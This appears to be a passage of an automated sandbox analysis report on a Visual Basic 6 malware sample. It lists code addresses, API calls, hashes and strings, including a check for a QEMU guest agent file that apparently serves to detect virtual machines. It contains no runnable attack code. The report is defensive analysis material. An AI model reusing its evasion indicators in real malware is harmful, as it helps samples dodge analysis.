                                                  0x00411ee2
                                                  0x00411ee7
                                                  0x00411eea
                                                  0x00411ef0
                                                  0x00411ef5
                                                  0x00411ef5
                                                  0x00411f0d
                                                  0x00411f15
                                                  0x00411f19
                                                  0x00411f1a
                                                  0x00411f1c
                                                  0x00411f27
                                                  0x00411f2b
                                                  0x00411f2f
                                                  0x00411f30
                                                  0x00411f32
                                                  0x00411f40
                                                  0x00411f44
                                                  0x00411f45
                                                  0x00411f47
                                                  0x00411f56
                                                  0x00411f73
                                                  0x00411f58
                                                  0x00411f58
                                                  0x00411f5d
                                                  0x00411f62
                                                  0x00411f67
                                                  0x00411f67
                                                  0x00411f97
                                                  0x00411f9b
                                                  0x00411fa0
                                                  0x00411fbb
                                                  0x00411fc1
                                                  0x00411fc3
                                                  0x00411fd0
                                                  0x00411ff5
                                                  0x00411fd2
                                                  0x00411fd2
                                                  0x00411fd7
                                                  0x00411fdc
                                                  0x00411fe2
                                                  0x00411fe8
                                                  0x00411fed
                                                  0x00411fed
                                                  0x00412003
                                                  0x00412020
                                                  0x00412005
                                                  0x00412005
                                                  0x0041200a
                                                  0x0041200f
                                                  0x00412014
                                                  0x00412014
                                                  0x00412044
                                                  0x00412048
                                                  0x0041204d
                                                  0x00412065
                                                  0x0041206b
                                                  0x0041206d
                                                  0x0041207a
                                                  0x0041209f
                                                  0x0041207c
                                                  0x0041207c
                                                  0x00412081
                                                  0x00412086
                                                  0x0041208c
                                                  0x00412092
                                                  0x00412097
                                                  0x00412097
                                                  0x004120ad
                                                  0x004120ca
                                                  0x004120af
                                                  0x004120af
                                                  0x004120b4
                                                  0x004120b9
                                                  0x004120be
                                                  0x004120be
                                                  0x004120ee
                                                  0x004120f2
                                                  0x004120f7
                                                  0x0041210f
                                                  0x00412112
                                                  0x00412114
                                                  0x00412121
                                                  0x00412143
                                                  0x00412123
                                                  0x00412123
                                                  0x00412125
                                                  0x0041212a
                                                  0x00412130
                                                  0x00412136
                                                  0x0041213b
                                                  0x0041213b
                                                  0x00412151
                                                  0x0041216e
                                                  0x00412153
                                                  0x00412153
                                                  0x00412158
                                                  0x0041215d
                                                  0x00412162
                                                  0x00412162
                                                  0x00412192
                                                  0x00412196
                                                  0x0041219b
                                                  0x004121b3
                                                  0x004121b9
                                                  0x004121bb
                                                  0x004121c8
                                                  0x004121ed
                                                  0x004121ca
                                                  0x004121ca
                                                  0x004121cf
                                                  0x004121d4
                                                  0x004121da
                                                  0x004121e0
                                                  0x004121e5
                                                  0x004121e5
                                                  0x004121fb
                                                  0x00412218
                                                  0x004121fd
                                                  0x004121fd
                                                  0x00412202
                                                  0x00412207
                                                  0x0041220c
                                                  0x0041220c
                                                  0x0041223c
                                                  0x00412240
                                                  0x00412245
                                                  0x0041225d
                                                  0x00412260
                                                  0x00412262
                                                  0x0041226f
                                                  0x00412291
                                                  0x00412271
                                                  0x00412271
                                                  0x00412273
                                                  0x00412278
                                                  0x0041227e
                                                  0x00412284
                                                  0x00412289
                                                  0x00412289
                                                  0x0041229f
                                                  0x004122bc
                                                  0x004122a1
                                                  0x004122a1
                                                  0x004122a6
                                                  0x004122ab
                                                  0x004122b0
                                                  0x004122b0
                                                  0x004122e0
                                                  0x004122e4
                                                  0x004122e9
                                                  0x00412304
                                                  0x0041230a
                                                  0x0041230c
                                                  0x00412319
                                                  0x0041233e
                                                  0x0041231b
                                                  0x0041231b
                                                  0x00412320
                                                  0x00412325
                                                  0x0041232b
                                                  0x00412331
                                                  0x00412336
                                                  0x00412336
                                                  0x0041234b
                                                  0x00412354
                                                  0x0041235a
                                                  0x00412364
                                                  0x0041236a
                                                  0x00412377
                                                  0x0041237d
                                                  0x0041238a
                                                  0x00412392
                                                  0x00412398
                                                  0x004123a2
                                                  0x004123a8
                                                  0x004123b5
                                                  0x004123bb
                                                  0x004123c5
                                                  0x004123c8
                                                  0x004123d9
                                                  0x004123e6
                                                  0x004123e7
                                                  0x004123e8
                                                  0x004123e9
                                                  0x00412416
                                                  0x0041241f
                                                  0x0041243e
                                                  0x0041245a
                                                  0x0041246a
                                                  0x00412470
                                                  0x0041247d
                                                  0x0041249f
                                                  0x0041247f
                                                  0x0041247f
                                                  0x00412484
                                                  0x00412489
                                                  0x0041248c
                                                  0x00412492
                                                  0x00412497
                                                  0x00412497
                                                  0x004124a6
                                                  0x004124ad
                                                  0x004124ae
                                                  0x00412515
                                                  0x0041251a

                                                  APIs
                                                  • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041110E
                                                  • #651.MSVBVM60(00000002), ref: 0041114E
                                                  • __vbaStrMove.MSVBVM60(00000002), ref: 00411158
                                                  • __vbaStrCmp.MSVBVM60(Out of string space,00000000,00000002), ref: 00411163
                                                  • __vbaFreeStr.MSVBVM60(Out of string space,00000000,00000002), ref: 0041117A
                                                  • __vbaFreeVar.MSVBVM60(Out of string space,00000000,00000002), ref: 00411182
                                                  • #570.MSVBVM60(00000083,Out of string space,00000000,00000002), ref: 00411197
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,Out of string space,00000000,00000002), ref: 004111B2
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A60,000002B4), ref: 00411216
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 0041123D
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411276
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000158), ref: 004112C0
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,000006FC,?,00000008,?), ref: 00411336
                                                  • __vbaFreeObj.MSVBVM60(?,00000008,?), ref: 00411356
                                                  • __vbaFreeVar.MSVBVM60(?,00000008,?), ref: 0041135E
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,00000008,?), ref: 00411376
                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,00000008,?), ref: 004113AF
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000138,?,00000008,?), ref: 004113FC
                                                  • __vbaVarDup.MSVBVM60(?,00000008,?), ref: 0041142D
                                                  • __vbaChkstk.MSVBVM60(?,00000008,?,?,?,?,00000008,?), ref: 00411474
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,00000700,?,?,?,?,00000008,?), ref: 004114B5
                                                  • __vbaFreeObj.MSVBVM60(?,?,?,?,00000008,?), ref: 004114D5
                                                  • __vbaFreeVar.MSVBVM60(?,?,?,?,00000008,?), ref: 004114DD
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,?,00000008,?), ref: 004114F5
                                                  • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,00000008,?), ref: 0041152E
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000160,?,?,?,?,00000008,?), ref: 00411578
                                                  • __vbaLateIdCallLd.MSVBVM60(00000008,?,00000000,00000000,?,?,?,?,00000008,?), ref: 00411597
                                                  • __vbaNew2.MSVBVM60(00405094,H9a,?,?,?,00401216), ref: 004115B2
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004115EB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000140), ref: 00411638
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 0041165F
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411698
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000060), ref: 004116DF
                                                  • __vbaI4Var.MSVBVM60(?,?,00000003,FFEAA630,00005AF7), ref: 00411730
                                                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?), ref: 00411771
                                                  • __vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,?,?,?,?,?,00401216), ref: 00411786
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,00000704), ref: 004117C5
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 004117F5
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041182E
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,00404E0C,00000088), ref: 0041187B
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 004118A2
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004118DB
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000080), ref: 00411928
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,00000708,?,?,003470F7,?), ref: 0041198C
                                                  • __vbaFreeObjList.MSVBVM60(00000002,?,?,?,?,003470F7,?), ref: 004119B3
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 004119CE
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411A07
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E34,00000120), ref: 00411A51
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00411A78
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411AB1
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000160), ref: 00411AFB
                                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411B1D
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00411B38
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411B71
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000130), ref: 00411BBB
                                                  • __vbaI4Var.MSVBVM60(?), ref: 00411C05
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,0000070C,?,?,00000009,?,?,00000009,?,?), ref: 00411CA3
                                                  • __vbaFreeObjList.MSVBVM60(00000004,?,?,?,?,?,?,00000009,?,?,00000009,?,?), ref: 00411CD2
                                                  • __vbaFreeVarList.MSVBVM60(00000003,?,?,?), ref: 00411CEE
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00411D09
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411D42
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000000F8), ref: 00411D8C
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00411DB3
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411DEC
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000130), ref: 00411E36
                                                  • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 00411E58
                                                  • __vbaStrVarMove.MSVBVM60(?), ref: 00411E67
                                                  • __vbaStrMove.MSVBVM60(?), ref: 00411E71
                                                  • __vbaStrCopy.MSVBVM60(?), ref: 00411E9B
                                                  • __vbaChkstk.MSVBVM60(?,?,?), ref: 00411EAE
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,00000710), ref: 00411EF0
                                                  • __vbaVarMove.MSVBVM60(00000000,00401118,00404A90,00000710), ref: 00411F0D
                                                  • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411F1C
                                                  • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00411F32
                                                  • __vbaFreeVarList.MSVBVM60(00000002,00000009,?), ref: 00411F47
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00411F62
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411F9B
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,000000D8), ref: 00411FE8
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 0041200F
                                                  • __vbaObjSet.MSVBVM60(00000000,00000000), ref: 00412048
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000158), ref: 00412092
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 004120B9
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004120F2
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000050), ref: 00412136
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 0041215D
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412196
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E34,00000198), ref: 004121E0
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 00412207
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 00412240
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E34,00000048), ref: 00412284
                                                  • __vbaNew2.MSVBVM60(00405094,H9a), ref: 004122AB
                                                  • __vbaObjSet.MSVBVM60(?,00000000), ref: 004122E4
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404E0C,00000118), ref: 00412331
                                                  • __vbaStrMove.MSVBVM60(00000000,?,00404E0C,00000118), ref: 0041238A
                                                  • __vbaChkstk.MSVBVM60(?), ref: 004123D9
                                                  • __vbaFreeStr.MSVBVM60 ref: 0041241F
                                                  • __vbaFreeObjList.MSVBVM60(00000006,?,00000000,?,?,?,?), ref: 0041243E
                                                  • __vbaFreeVarList.MSVBVM60(00000003,00000008,00000008,00000008), ref: 0041245A
                                                  • __vbaHresultCheckObj.MSVBVM60(00000000,00401118,00404A90,000006F8), ref: 00412492
                                                  • __vbaFreeVar.MSVBVM60(0041251B), ref: 00412515
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247262762.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.247259243.0000000000400000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247273293.0000000000414000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: __vba$CheckHresult$New2$Free$List$Move$Chkstk$CallLate$#570#651Copy
                                                  • String ID: H9a$Out of string space$Refunded$gumly
                                                  • API String ID: 4012266371-781289493
                                                  • Opcode ID: fdf09f111b7c491c87b664aec0a306e278908651b66724f62f46b54155cdf331
                                                  • Instruction ID: 06abf8c5fb3c241c9923e8e598abdf1e68e20cf40259c486db2563cd23e2bac8
                                                  • Opcode Fuzzy Hash: fdf09f111b7c491c87b664aec0a306e278908651b66724f62f46b54155cdf331
                                                  • Instruction Fuzzy Hash: 3EC2E6B19002289FDB21DF91CC45BDDBBB4BB08304F1045EAE609BB2A1DB795AC5DF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160732, Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 303COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $*e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 0-3647266377
                                                  • Opcode ID: 6faca125cd87f524f6e7210a7490b80858b78110ffb003dc78951c1abcff047d
                                                  • Instruction ID: b79546af0e4c049ce6edd28e32ededa55ba5fbd4a0c9febed09e5887e15ae154
                                                  • Opcode Fuzzy Hash: 6faca125cd87f524f6e7210a7490b80858b78110ffb003dc78951c1abcff047d
                                                  • Instruction Fuzzy Hash: 5991CD60AC43466EEF35257848BD3FE1767AF466A4FA9450ECCC2424C5EB6984E3CE42
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216081E, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 288COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadProcessTerminate
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 3349790660-4052621041
                                                  • Opcode ID: 9ddafc5296f67f0da6e6ba6d401977045a8e10f018c20fb9d0fce48962aeffc8
                                                  • Instruction ID: d423cc02225cdb5757cd4f5570db10958674aacab86cbb83b1de8532cd16cc0f
                                                  • Opcode Fuzzy Hash: 9ddafc5296f67f0da6e6ba6d401977045a8e10f018c20fb9d0fce48962aeffc8
                                                  • Instruction Fuzzy Hash: F581DF60AC030B6EEF3425688CAC7FF1267AF45790FA5411ADC8692084EB3984E3CE52
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216084E, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 0-4052621041
                                                  • Opcode ID: d37e8ae7454403230134958a70cf5c7e68731250d730231acba91cee28d44ce7
                                                  • Instruction ID: 222cd492d7e11fa720c01c454f89e130a405eec9dea4984fea44ffbeaa001a39
                                                  • Opcode Fuzzy Hash: d37e8ae7454403230134958a70cf5c7e68731250d730231acba91cee28d44ce7
                                                  • Instruction Fuzzy Hash: E671C064AC03066EEF34257848BD7FF12679F457A4FE9461ACC86464C4EB2984E3CE13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021608FB, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 234COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 1029625771-4052621041
                                                  • Opcode ID: 03affc87cfbf16cf85104c2c93d0802b3e3c55b605efdb507ddb61980c16d737
                                                  • Instruction ID: 5a1eabcda624f9dba1419b5df3b080230709f03a5ad7d004ac9500104ccd845e
                                                  • Opcode Fuzzy Hash: 03affc87cfbf16cf85104c2c93d0802b3e3c55b605efdb507ddb61980c16d737
                                                  • Instruction Fuzzy Hash: F161C060AC434A5EEF34297848AD7FF1267AF45794FA9450ACC86425C4EB39C8E3CA13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160885, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 230COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadProcessTerminate
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 3349790660-4052621041
                                                  • Opcode ID: 71d1405d1f005531a41f07800289d2b2eebbdc01848dc13e87c917296c67b4cd
                                                  • Instruction ID: 034713a97425c93b8c15f0143e230f8699bd19db35dfe98f4a34b93814cb5cbd
                                                  • Opcode Fuzzy Hash: 71d1405d1f005531a41f07800289d2b2eebbdc01848dc13e87c917296c67b4cd
                                                  • Instruction Fuzzy Hash: FA619E64AC030A6EEF34256848BD7FE1263AF45794FA5461BCD86460C4EB2984E7CE13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021608C2, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 224COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 0-4052621041
                                                  • Opcode ID: 29fb62c069866d230bf2eb0285c2ca92e2ae4f89d2b46a74830cc1f98c24ffbe
                                                  • Instruction ID: 6a6526b980d9bb3594b0e92095145faedea161df4b5e4ec66e18f2bae9f87ef0
                                                  • Opcode Fuzzy Hash: 29fb62c069866d230bf2eb0285c2ca92e2ae4f89d2b46a74830cc1f98c24ffbe
                                                  • Instruction Fuzzy Hash: 3B619C64AC430A6EEF34297848BD7FF1257AF457A4FA5451ACD86420C4EB3984E2CE13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216095E, Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 199COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: *e>$WF=$&A$+B$3W$v?
                                                  • API String ID: 1029625771-4052621041
                                                  • Opcode ID: c6aa418f0ca7549ad112512d8d4eca5489704242ef29591b7a4b884dd8c0252c
                                                  • Instruction ID: 21be5c976af0d3cc8b38529174151d6335207f4fb24070803aced58d62aef2dd
                                                  • Opcode Fuzzy Hash: c6aa418f0ca7549ad112512d8d4eca5489704242ef29591b7a4b884dd8c0252c
                                                  • Instruction Fuzzy Hash: 8851B164AC43466EEF34256848AC7FF1257AF457A4FA5851ACC86521C4EB39C4E3CE13
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160A0E, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 151COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: WF=$+B$3W$v?
                                                  • API String ID: 0-1479188220
                                                  • Opcode ID: d7b8c006a405bbbbf4a5efb24da1f89fb7429813a2a444b5e9d48107fe0e6939
                                                  • Instruction ID: a418901b6d9d184d3838df62b898e973850f7bebad58e0eaccf11467db9918b7
                                                  • Opcode Fuzzy Hash: d7b8c006a405bbbbf4a5efb24da1f89fb7429813a2a444b5e9d48107fe0e6939
                                                  • Instruction Fuzzy Hash: 5F41AA6498434A9EDF34256C48AC7FE1263AF456A4FE5854ACC8342884EB2A84F3CE17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160ACB, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 124COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: ProcessTerminate
                                                  • String ID: WF=$3W$v?
                                                  • API String ID: 560597551-1288605676
                                                  • Opcode ID: f7d3bf4c3e4ee339384959b5dadb798baeda878ddf6ecdde2367314898cc174e
                                                  • Instruction ID: e52a83bfde69280a4055949c81e287666d7afe8c0d25fa916dd5765e357ea2e1
                                                  • Opcode Fuzzy Hash: f7d3bf4c3e4ee339384959b5dadb798baeda878ddf6ecdde2367314898cc174e
                                                  • Instruction Fuzzy Hash: D1418C605C8386ADDF34267C48AD3FE1663AF45258FA8C64ACC87414C5DB7A84F7CA17
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02163197, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 158libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  • LdrInitializeThunk.NTDLL(02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02163AC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: InitializeLibraryLoadThunk
                                                  • String ID: ntdll$user32
                                                  • API String ID: 3353482560-2819403547
                                                  • Opcode ID: 99b1d2b8824a255e168fb605d9fd271b7a1ef016b39a03c15192fe45b7f789db
                                                  • Instruction ID: 8e7a4b292d79ade4a3bdc80408ce29542f3eaf67a8152e206d251f9ad3dd145e
                                                  • Opcode Fuzzy Hash: 99b1d2b8824a255e168fb605d9fd271b7a1ef016b39a03c15192fe45b7f789db
                                                  • Instruction Fuzzy Hash: ED5167617993D68ECB31AB7445693FE7F63AF13751F58808DCCD216182CB718912D706
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 021649A3, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 107COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID:
                                                  • String ID: "O%T$"O%T
                                                  • API String ID: 0-1902138262
                                                  • Opcode ID: bfe78ab1c2654ea38a39ddfad6c8791fe99d427352b154db30ec3cf40e8ce43a
                                                  • Instruction ID: 3fee5ce92d6c7589b49afa4c929a6e0d510686cc9943e3c959322cb12a792e31
                                                  • Opcode Fuzzy Hash: bfe78ab1c2654ea38a39ddfad6c8791fe99d427352b154db30ec3cf40e8ce43a
                                                  • Instruction Fuzzy Hash: EB315BA125C3A05DDB36A6B8406837DAF13AF61666F59408DDCC313552DFD3C462A31E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02160B96, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,00000000,000000FF,00000007,?,00000004,00000000), ref: 02162C23
                                                    • Part of subcall function 02164B00: LoadLibraryA.KERNELBASE(?,8802EDAC,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,00000000,00000000), ref: 02164B8C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoadProcessTerminate
                                                  • String ID: WF=$3W
                                                  • API String ID: 3349790660-3626065869
                                                  • Opcode ID: 4e383e5d02b4c15448e34f9747e79c32583ff740d7c7591964087c16d7973f81
                                                  • Instruction ID: 6e311c8ac963435d9ef7bc1205b65db683c67a4a2600bcf34dde2f949fa5a3c0
                                                  • Opcode Fuzzy Hash: 4e383e5d02b4c15448e34f9747e79c32583ff740d7c7591964087c16d7973f81
                                                  • Instruction Fuzzy Hash: 07318B7068838A4DEF30653C489D7FF1653AF55354F94829DCD87064C5DB7A80BBCA16
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 02162F4E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02162F61,02162FE5,021606B0,?,021653D5,02160484,2D9CC76C,DFCB8F12,27AA3188), ref: 02162FCD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID: C:\Program Files\qga\qga.exe$S4
                                                  • API String ID: 823142352-3139680767
                                                  • Opcode ID: b42c2740617d6fc63edd6f6268b3737260a073c404d0473f838a3918ff74501d
                                                  • Instruction ID: ede0c0fa5c5ab75933c3164b2e9aca51f7acb043868118881815853646a85d67
                                                  • Opcode Fuzzy Hash: b42c2740617d6fc63edd6f6268b3737260a073c404d0473f838a3918ff74501d
                                                  • Instruction Fuzzy Hash: 02016D62FD43106DD72152B01D5DBBE7A278B12E31F6902CDECE2058D3C7A15139821A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0216398A, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 98COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.247601967.0000000002160000.00000040.00000001.sdmp, Offset: 02160000, based on PE: false
                                                  Similarity
                                                  • API ID: LibraryLoad
                                                  • String ID: rX4
                                                  • API String ID: 1029625771-805084833
                                                  • Opcode ID: 1f41f5499ce2295094cc7ff20431c6c1bed590e92d198be0860d04e387fd8fbc
                                                  • Instruction ID: c7e4e0fcb2a8db2b97cb43ff37d5bc6fd27ecf674560e3881d5d6fa3de4b5ef2
                                                  • Opcode Fuzzy Hash: 1f41f5499ce2295094cc7ff20431c6c1bed590e92d198be0860d04e387fd8fbc
                                                  • Instruction Fuzzy Hash: C331DC6164E3D24DD722AF70429D2AABF23EF63714B1880CDC8D256453DB92C412E74A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

